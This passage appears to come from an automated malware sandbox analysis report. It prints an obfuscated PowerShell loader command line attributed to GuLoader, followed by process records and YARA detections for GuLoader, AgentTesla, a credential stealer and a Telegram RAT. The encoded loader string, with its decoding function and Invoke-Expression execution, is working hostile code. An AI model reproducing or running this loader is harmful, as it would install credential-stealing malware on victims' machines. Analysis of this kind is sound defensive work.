Su'SaEOmDCh9ZoFSu9PeDEk8PiBAfEFl9BaFAp4MeEel9Sp9Ra2Sk8Re8CoBMa9daBPr9co8PyDBaATh6FrAGe4EcAEt8PiAFa0exASk7Gs9fo4BuFRe3PrFHr3Te8AnAAdBBaCNyBheBOpBDiBCaAUnCAlASt7HeBInDTh8KeDSnAId6RfADe4RuASe8OxATr0JuAFr7KaECo7Mi8KoDTvABaCQuAInFDeATi0SkAPe7GaADeCVa8StDJaBCo0ApAKi7FjATa8AlATe4CaAMi0ReAOiAAr8Ln8AnBSaAtrBSaAsoAFrCGeAHa4NeALaBTrAPl5DiBat0MaENi1ImEMa1Un8Li7trAesCFoBRoEReELa4Ve8Ac6UnAHoBEqAAa3coAaaCExAToAStBImDInEJe9in9FaAEvBSk0afBHyACuBTrDPrAinCTeABe4CeEAm7Ta9raBPeAWhCscAnaFBrASp5beAAcCBiAUnARkBInDFoAMu0KlAFh6HyAAm7BiELa7Pr8ba8FaBFoABrBStABeACiCLaALi4SeAEnBAtACr5laBSl0He8Sp7ChAMo8UnAAj4FiABiComEOv1KoEsuDFi9ViBLyADeCHyACoABnAAf8KaAFr5DoADoAEtAEr0PrBAsDStBWhBFiAHj8PrBReDCeAWiCKaFMo1frEUn0PiEOi0duEBr5PjEMo9La9An2Fa9KoAGeBIn0CrBSmALiBAxDLoAUlCBuAFa4MbEPa7Fa9KaBTrALiCEfAPaFInAsl5FrAjoCKoAPaAMaBUnDKoAEt0InANa6SeASe7NoEDi7Sh8UpCalAUb4DiAEt0foBChDKoEFo7Da8Re8HaBHoAMaBNaABeASpCspABo4InAOfBhjARh5AnBLo0Ba8FoBfiBStCCaAal0SiAPr5CoAHaDshAAcCSkBFlBSt8Pu8UrAsiAPrAYoAHuATlCKrBInAKaBStASy9Al4TiFOn3kiFMa3Fo9viBPaBMoCHoAbr7WoECe0FyEGn7ca8KoDKoAGeCAfAMaFStAco0BeACo7SkAfoCAn8StDAkBGe0meASt7DaAIn8WoAJo4VeAKo0EnANoACh8Ve4ScACr6KaAStDDrBArCFeAKu5SeAFrCFlEPa1MeECuDbi9HeBcyAReCCoAOsADiACo8LaABa5beAShABeASc0AmBBrDteBExBfaAes8frBUnDUdACrCFlFBr0TrEbe5afELy9PhEgiDDiABuFScAkm8BeAko5MaBLyAOvAGaCStESv0DaEAa7no8liDStAMaCYiAReFunAAn0UnAKv7EkAEnCOr9OcDInBUn0DaBIn9HvAmuCVeEUn1afEAmDMe8SpDStASoCMaAFr4CrAFa8ViAScENoABo7VaABrCPrBBaDFoAOb0unBAn3ReAPi8CaAreBUfAFi5BlATaCInFSn9PeEAn5fuEPu9DrECoDBu8teDIlACaCIlANa4ReASk8PrAFrERhARe7BrAHjCNeBUmDBiASa0HyBKo3WeAHe8UnAFiBAfABu5PnASaCPrFGe8StEFi5LuESu9An9Ti2Vi9BeAToBPu0FlBDeABrBFoDJaASkCQuAsk4SuEFr7Pa8Ry4SuBMiCVaAAc5BiBMaDSuAHo0SkATiAMaAAr8EmBHeAPiBLiDfo8AnDTuABrCAtAPl5FrAPrCExAWaELiATr8BlBSnDSiAImCMi9Un4EtEHa0Bl'Tr;Po&Co(Ov`$PrDBleRdmGlaSmgDenPteChtaniFrzstaKebCalHaeEn7Wa)Bd Mi`$AnASkdfosElcMirPoiLapUntsuiZotCaiReuUnsMe2Di;St`$GaANedsmsAbcExrAeiMopSatTeiPutBoiViuNosRe3we Ta=Re TiHTaTStBEr Ac'CaEGrDjo9GiFSw9SkDAn8CuBNaEYa7Ex8InDCaAMoCOfAhyFMuABe0BrAEl7PrAMeCCh8prAInAAn6ReADh7RdBMiATaBCuDCaBNoBSuBFrCRaAScAGuBMiDmiABe6FrBCoBUnERa1BeEHuDTu9SkBChASeCpaAFoAHaAIn8MaAAu5koAsoALiAtr0ThBOpDStBSkBLaAEs8gaBAbDGaAfeCInFTsFBaEKr5NaEsp9Su9Af2Fo9PoATaBSt0SkBvlAKaBSkDRhAAaCReANo4MiECr7Pr9BrBPrAprCAnAQuFFrAFy5CyAKoCOmAOrADeBSmDAfAXy0DaAIn6InASe7HoEgu7Kr8SaADeAOv8HeAAf5crAMi5skAPj0meAKa7MaALiEKo8KlASdABi6BaAFi7DaBIdFClAPaCBoAEn7BiBbaDUtAFo0CoASe6FuABa7ArBNaARe9Ma4FuFLa3PuFSc3El9SiACeBUbDMoANo8UnADe7NoAKaDufAFi8LiBFeBHjASnDPrEGu5GuERu9EnEBrDCaBSyFsaAGa8SwBBaBMa9Us6TrBCo9LuARo8DeBNrBKaAOn8TrABa4CpACoCOuBAnDSiAUdCNoBQiBEvBTeAGeEOp0AnESt7lo9SeABeACrCFlBNrDTv8Ka0KuAox4WoBPl9SoAPi5EdAplCmyAPa4DuASiCToABl7InBBiDuhALe8SnBInDLiAEf0ToASy6reANu7Af8FiFPoAPr5StAEc8GsASlEceBcoAKoEWa1AgEFoDFe9KuBSdAPyCMeAStATkATr8LuAEx5SkAScAMaAUn0ErBFlDSlBIsBScATn8KnBNeDFeAKaCTaFByEDiELa0Ro'Fo;An&Sp(Sp`$SoDBieBomcoaAggFunpseUntBuiWrzFaamabAfludeer7Ov)Gl Di`$EvAAndSisUtcAnrSoiRapKotAciSttSpiApuNosRa3Sc;Te`$LaAApdChsUzcPhrSaiPrpButKaiGrtsaiIcuDrsLo4Bo Af=St SaHHiTChBDi Kr'OuEteDKo9PeFHy9NoDCa8RaBDeEPi7En8SnDAsAUdCnoAIrFReAIn0KuASa7InACrCBi8Ho4FaASaCTrBPaDFlACy1FoADr6noAMeDYeEBe1TeEsuDDr8PeDPaAJoCBiAPa4crAFo8LnAJrEShAFo7alAGaCBlBFoDSuARe0WhBSt3BaAGu8JuAPaBMoARa5UiAReCHeFWiBBeEMe5QuELo9HoEFoDGe8BrDVrAPhCplAIn4RiABo8taATaEObASt7KaASkCSuBMiDchAHe0MuBTa3KoASu8SuADaBSpAEm5PrAFnCReFPlAVoEPa5JaEAn9trEPaDnoBSiFGeBInBAtBunDSoEHa5ReEHa9KvEKoDVoBNyFPiAEc8AlBReBFo9Po6LaBOv9GgAde8InBkoBToANo8PaASk4OlAMaCMeBReDEtANeCPrBMaBTrBPrAInEPo0unENo7Ca9AbAHyAEfCOrBSeDve8Pl0ReApr4TrBRe9LiATr5SpAKoCUnAFo4CoAUnCSvALa7foBGnDBlACo8ToBThDEmADa0saARo6OvABo7An8PsFPrADi5SpABo8FlALiEAcBBeAafEMa1UlELaDTo9UtBHiADaCInAPhAPlASa8UdARa5teATiABrASk0UnBMaDStBMuBunAAf8MoBAsDSwABoCAfFSpELeEBi0Tu'En;En&Re(Fa`$SuDvieSpmSuaLygRenBleEntJoiCazInaPobpulAseTi7Ly)Re ga`$kaAModUdsBecstrTriFopHatBiiswtFliTiuEnsHa4Ga;Co`$SkAChdPisIncCorBiinepBatHaiVatteiinuErsTe5Fo Gi=uk FlHBeTHyBBo Fl'DyBFrBJaAStCLeBLaDReBSpCInBInBBoALo7RoEPt9TmEbaDBe9HiFAm9PeDTh8LaBViEOv7Pa8UdATrBOpBjiAtrCAfAKo8LeBReDDrAUnCCo9CoDChBTy0KiBMa9GaASiCFlESo1SkEOp0Go'ki;fl&Ca(Ba`$deDSaeStmWoaLugNunBreOrtDiiTrzLiaGebSilMyeKo7Pr)Ga Sp`$JiALidHasRocUnrBriUppGetFeiTitDiiAdustsSk5Co Ki Pn Tr;Sk}Bo`$enkSukUl Sc=Sk SpHSlTSaBLo Be'EnABa2MaALaCMiBPoBMoASu7SpAStCMoACo5BiFAlAFjFAbBKe'Fo;Pa`$ViASidPrssucHarBeiFopOptUniEktSmiOkuSpsub6sp Ti=li PrHCaTWhBHo St'unEAlDToBPrFEnAOp8ViBviBAn9So6RaBFlFElAMe8BaEAr9EfFSm4BaEMi9Bi9Am2Ub9slAUdBMa0MeBKiAInBLiDMeARoCSuAUn4pjESt7Dr9fiBUdBSqCReAPr7GrBInDCaATr0NaAby4FrAudCHyEDo7Mi8Fo0beAHo7ReBBoDCoAFjCInBDoBReAEl6BoBPe9Vi9SuAFoANoCXyBFnBBlBMeFveAfe0OuALeASlAdeCKaBTjAChEDa7Ha8No4KoAOp8HoBAlBGaBAlAfoASe1SkAPr8MiAZy5Ap9Dr4RuFKl3HjFRo3Cz8WiEkuAMeCSkBTwDRi8SpDDeAAgCPsAGa5ClABeCRiADeEIsAKa8LaBLiDSlAKnCPr8PoFPjANa6PrBStBCi8SmFBaBNaCSaAfr7InAAdASpBTvDApAKl0DoAIn6GeAHe7Na9Sp9NoAJo6FoABo0TrARa7KlBOlDTrASpCXiBFaBKiEin1SoEKn1brACaFDeAPh2UnBDa9CaEDe9ChESeDTaASt2SuAVa2AlEMa9TeEBeDCa8WaDOpATiCElASt4UnAaf8GsAApEMiAsk7EgAFiCSpBQuDFoAPr0SpBDe3HeATi8UsAOfBPaASa5ShAreCGlFSuDKoEOm0stERe5heEGl9chECa1Hy8NoEFo8AnDSl9SeDFeEEx9Sk8Ma9suESu1Pi9St2Sc8Fl0ReATo7FlBLbDRe9st9MiBArDdeBKrBBi9As4OrESt5AfESp9Ga9Ty2Kl9PrCPe8Ro0InANo7FrBAaDUvFArAMiFMoBSp9Ro4CoEPe5UdESe9Tr9Me2Sk9SlCru8Ek0BeAFi7FlBflDVeFHoASiFEmBOv9Ax4urEDu5PaEmu9Un9Om2Pr9LiCSk8Ar0SmALu7UnBCoDimFSpANoFCyBBr9Fl4MeEUn0MoEPa9LaEBe1Va9Pr2De8Re0CuASk7PrBEuDas9Sk9SgBGrDSkBWiBFo9Do4HaEIn0PuEAd0BaELa0Pr'Re;Su&At(Te`$AfDFueUdmSaaStgFrnBaeArtLaiStzSnaAgbFllHoeSv7To)In Sy`$UnAFadSlsLocudrUniPrpObtTiiGetUniCruZosRu6Pr;Fo`$ChvFoaefrKl_SmnRutUn Be=Ud VaftokAppSk Sk`$BrDPreGemDiaIngStnUneHotBaiHezKeaEmbaflbeeth5re Be`$OcDLaeFimRaaRugLanTeeKntPoiBezHraGabPolSjeSl6sa;Fo`$IdAMidVesTocInrMoiLapSwtPliEktOpiReuPasFr7Ba He=No PrHUpTPrBOr Ob'BeEMaDFu8Pe8seBNiBPrBFeDCyAKnCSeASyFCrADe8GeANe2syBPeDKiAFlCefBSeBFaFGuABiEAr9spFHu4DeESt9FiESsDFlBReFHaAre8ouBHuBPa9Di6BlBSeFUnAre8BiEHo7Fa8Ri0MeATi7miBDeFKoAKu6JaAst2teAInCTiEAn1An9Op2Ak8Hi0KlARe7AfBDeDLa9My9DoBStDReBPrBPr9Dy4reFTr3KaFEd3ri9Co3RiAViCKaBAsBHaAEk6OrEMi5UnEUd9tiFUkAMoFBlFTeFTrFToEKo5UnESa9RaFCe9NoBBo1RiFEsAGiFBr9BlFFo9TnFHa9MaEMa5PaEJa9GrFPe9FrBUn1trFLaDOvFKe9SkESv0Ov'Ap;In&Om(pa`$PeDSleWemcaacigPunLoeFatNeiDezHeaPabFrlWiebl7Ve)Ac Py`$MaARedPospicSkrM iTipTytObiamtoniSkuTesan7Pr;Su`$BiACodPrsBocKirusiIcpDetSliPetLyiteuPesEf8Un Po=Tr FrHphTNaBDy Ti'ErEGrDcoAAc6fjBKaBEnABe0UnERa9ChFSp4SmEFl9SuETeDCoBafFIcADu8BlBRaBFr9Sv6KlBFiFJuASi8FoEPa7Cl8Pe0MiAKo7raBVaFdiAMa6NaASp2ArASpCgaEbr1Ap9Re2At8Ku0CaASp7BlBKuDLa9Im9MaBBoDPhBGwBRe9em4caFSt3PoFov3br9st3VoAUnCJeBmaBEsAAc6CoECl5UnEOo9MiFBa9KeBDe1BuFHj8SmFSk9DeFUn9foFCa9HuFAl9KoFEn9EgESo5BaEDe9UnFTa9JaBCl1AkFPrATeFFi9TeFPi9NoFBu9opENs5BoELe9EuFBa9TaBEn1KrFToDTrELi0Ti'Sk;Pe&Ln(in`$PrDQueKemKraDrgOpnReeUntWhiblzKraUrbKllDaeAr7Os)Re La`$luAgldNosAncHorUniSopNitEpiCotFsiaruUlsHy8Ha;Bu`$FosBspCaiOvlafdTeenuvDdaAnnOpdJosDrpPerFloKojDheTekAptFleSerMy=By(chGFoeTatda-DoIOrtBeeBomUdPGrrsaoSppDiestrBetPhyCe An-DePSpaJatSlhSt Un'GaHAaKEfCStUPa:Ud\FlKOpyHaseahTaaViaManbodleearnSt\MidCouRemMepNoeCotDesSu'Vi)Br.SklBeaLoyPnldraJasca;Va`$KoAGedAdsStcInrIniSepGrtheiTitFuifeuRasSp9Sa De=Ch UnHLyTInBFl Ve'NaEGrDPr8Gr8ReACyDGaBCaAAcAUnAFoBStBPrAkl0AlBBa9CaBImDPaARe0NuBKoDPaAOt0UnBToCPrBAbASeEEn9riFCl4EmEbl9Fo9Ne2De9TrASkBSt0TaBbiAChBCoDSpAMeCIdAAn4PhEBe7Dd8TeAPaALo6SpAGr7ReBHiFCaALeCSeBDeBSkBGoDBe9Li4EmFHy3rgFUn3Ar8VeFNoBFiBenAin6DiAAa4Br8UnBFiApi8YvBAfABaAHeCSuFGrFFaFBaDin9VaAUnBCoDToBOvBInALa0LrAAc7mbATrEStECo1SaEMaDBlBUdAFaBBe9CoASk0NeABa5anANaDCaALeCJeBIdFAkATi8YdATa7DeAbaDUnBFoAEpBMi9ChBTrBSvACa6SvAPh3AgASyCJoAre2RuBvaDMiAUnCKeBInBJoESt0co'Co;Sa&Re(Fo`$ImDbeeUdmSaaOugUdnMyeDetSaiDizLiaMebGelKoeOv7In)Le Su`$CaABedcrsFrcBaririSypDitLaiKetAdiAnuEpsSi9Am;De`$TesAgpreiOplisdCheKlvLeaDenLadkosprpInrFdouljSkebukMatsheRurNo0St Sp=Ge JoHToTDeBMo Re'Pr9Co2Ko9CiArhBLi0chBSnATiBevDNeAPoCBaAAn4heESl7Ri9TyBUnBCeCEnAMo7PoBPaDFeATr0StABe4stAStCExEbu7is8Ch0GeAWa7SkBAlDReAInCInBMaBcoADe6MoBSi9Ad9HjANeAUdCReBFiBAlBUnFKkADe0ReAVaATiAOvCSuBEuAAsESp7Hy8Af4MeARe8InBTvBLnBSuAPrANo1PaASi8UdATo5De9Al4UlFDr3UnFFo3Bu8ReARaAJo6FrBNi9kaBpo0HaETh1FrETwDSs8se8PaAAlDPaBWaAVoAPsAFnBDeBteASl0VeBFo9SuBBrDHyATo0koBEgDdeAHe0olBGlCPaBboAHaEEr5PoEVn9SeFLu9TeEuf5GlEDe9RuEbn9PaESlDMt8Di8JuBAmBteBimDItAVeCArABiFUsAHy8UdARd2MeBLlDtrATiCanBSaBBiFKuAHaEGo5PaEOu9StFSkAHyFLiFVaFCoFBlEEn0Xe'Er;Ma&Af(Ly`$scDCoeFrmGaaThgChnTreTjtPyiDizImaEpbTilSaeTa7Um)Ra Ta`$PosLapUniAnlEcdtreTrvdeaPonSadSasnypCorBooRejFoeSakVotdieSvrSn0Li;ph`$FasTyiSpzvaePa=Ha`$GeAOvdbrsEqcAprstiPapQutHuiLitSyiUnuWrsPa.AncInoBeutenUntAv-Ou3Di6Si6Ty;Af`$BesMepMyiSylSadJdePevMeaAsnSydSpsSlpPirGroEwjHyeSukEntNeeRhrSa1Kr Le=ne HyHHaTInBSa Un'No9Pe2St9FlAGeBIm0PuBStAbeBBeDTrACoCTrASe4ReESa7Sa9SpBmoBGlCEfASa7TfBDuDKoAAf0miASc4TiAofCMoEOr7Pa8Ig0NoALe7FiBTuDDeAJaCBoBChBMaAFi6GrBPr9Ch9SwAJeAImCHaBSaBOrBGrFFoAPr0KnASiAPrAHaCudBGeAVeEEl7Ed8Cl4biAFr8NeBOdBRaBDeAGlACr1TrAGa8PsAPa5Gi9Ze4NoFBl3auFFo3Mo8KiAorAAf6NeBKr9TaBDy0TiEUd1DiENiDbr8Ga8KaAPaDBhBEnASkATyABgBVeBuoAAb0AbBDo9FoBSyDDiARe0BaBBoDWaAst0VuBSuCTaBTyAImEFo5skEFl9FeFPlAWiFInFklFKrFViENe5VaEsv9HoESuDEvASp6tiBMiBKaAKl0BaEBa5kvERi9SmESvDStBHaAChABa0CoBFl3SyACoCRmEPs0Ir'vi;No&Re(Di`$PaDUdeRamPraAvgpenAneAmtSyiSezSoaSvbSalfieDe7Ov)Sm Ko`$MusBrpDyijulDedMieovvJoaCanPhdAtsOrpFrrPaoFojNoePrkBotSoeKarHe1Bv;Ca`$AgsRopGriJulPodBreAfvRoaUdnSydChsStpFerAnoCijWeeStkAntWieRerTo2Un Ro=Sa MoHVeTFoBan la'inESaDPlBPjFMoARa8MiBUgBno9Fl6guBTjBOpBAmCAnACy7PeASy4PuAShCOpETi9CeFCo4ExEDe9Fa9Un2un9ToAPaBTe0LiBEmASaBcrDPrACuCSoAFo4HoEPo7Re9PeBzyBBoCJeAka7HoBPrDJuAAn0CuAdi4PaAgeCraEwo7Di8Fa0ReASe7StBAnDOvAGlCAfBInBObAor6UnBLy9No9KaASaAOpCDiBInBAbBTrFToATy0BeAspAFlAArCskBInAWiEBr7Ba8Yd4YaABu8UdBSkBVaBfoATeAHo1AbAFo8FaAMa5Jo9Wh4WeFMi3heFFo3Re8CrESkAInCRaBHoDGr8TaDAnAViCkrAPr5ReAEfCFiATaEAlAAp8beBprDChAHaCPe8klFUdALi6GeBStBFo8gaFSuBShCafALr7AtATrASlBBaDHaAAn0SoAbr6TyAFl7Uk9Fr9FoABr6BuAPr0PoAHe7doBDoDanAMoCCrBAfBPaECh1PaEapDPr8gr8HjBDvBAaBLoDSuASkCSfAFlFHiASv8DiADd2inBSuDMaASeCCeBhuBYdFFiAunEBr5StEVe9CiENe1Ud8PhESa8InDOr9NaDBaELi9Ko8An9UnEIn1Ka9Ce2Re8Pl0ErACr7OmBSmDhy9No9HeBIdDCoBBeBUn9Ca4veELe5Or9Ps2Be8St0CaAMa7TjBUpDBl9Ud9KaBMyDLuBArBRe9do4SyEBi0SeEGr9FrEAn1Pr9Op2Un9CiFPoAEx6MoALa0VaAVeDSp9Ch4ChEWh0ArEVa0BeEAn0En'Di;In&Ma(Li`$GeDCheEumOuaHvgLonNueUatFuiMizfjaKrbEtlOeeIn7Fo)In Ma`$FosDepGoiLalUndMieAmvWhaImnTydGesFipAnrDaoMojJaeUskOmtFaeHorso2Fi;Ou`$AnsNypOviSplTadKoeBlvReaInnSadSisOppAlrbrochjHoeStkSttmoeBerre3Pr Cu=Sa PhHFuTsiBpa Vo'ovEBiDHyBPuFwiASt8PeBkuBIn9Bo6VeBStBUnBKvCDiAUn7NaAGa4KoAFiCveEFa7Tr8Sm0UdAFl7HaBDeFHeATa6HyARa2EnASkCSaEEx1AdERoDMaADd6InBOpBSaANo0InEBr5TaEAdDInBHaFHaADi8AfBBaBce9No6RuASa7BuBUnDMoESu0Mu'Tr;Sw&Go(Se`$ReDHaeBemRoaPrgHenRoeSythuiLezPlaPabPjlHaeAa7No)Un ne`$ResStpHeiFulRedOteBrvHuaGonDedFesStpKvrIboDijSteFikFntReePlrSm3Ni#Bl;""";;Function spildevandsprojekter9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Brndoffers = $Brndoffers + $HS.Substring($i, 1); } $Brndoffers;}$Chlorpikrin0 = spildevandsprojekter9 'AgIPaEBeXBa ';$Chlorpikrin2 = spildevandsprojekter9 'CosLatHuaCerRytRe-RejAfoYvbRi ';$Chlorpikrin1= spildevandsprojekter9 $Damspils;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Chlorpikrin1 ;}else{&$Chlorpikrin0 $Chlorpikrin1;};;;
                        Imagebase:0x6a0000
                        File size:433152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Target ID:11
                        Start time:20:45:43
                        Start date:28/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff773f10000
                        File size:875008 bytes
                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:12
                        Start time:20:46:47
                        Start date:28/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                        Imagebase:0x210000
                        File size:108664 bytes
                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:13
                        Start time:20:46:48
                        Start date:28/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                        Imagebase:0x9f0000
                        File size:108664 bytes
                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000000.3773940652.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                        Disassembly

                        No disassembly